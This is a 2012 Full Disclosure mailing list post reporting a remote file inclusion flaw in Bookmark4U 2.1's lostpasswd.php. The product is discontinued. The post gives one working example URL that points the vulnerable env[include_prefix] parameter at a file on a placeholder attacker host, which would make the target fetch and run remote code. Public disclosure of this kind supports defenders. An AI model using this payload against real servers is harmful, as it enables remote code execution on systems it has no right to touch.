Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

From: BugsNotHugs <bugsnothugs () gmail com>
Date: Mon, 02 Jul 2012 01:01:33 -0600

vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued

example - 
http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: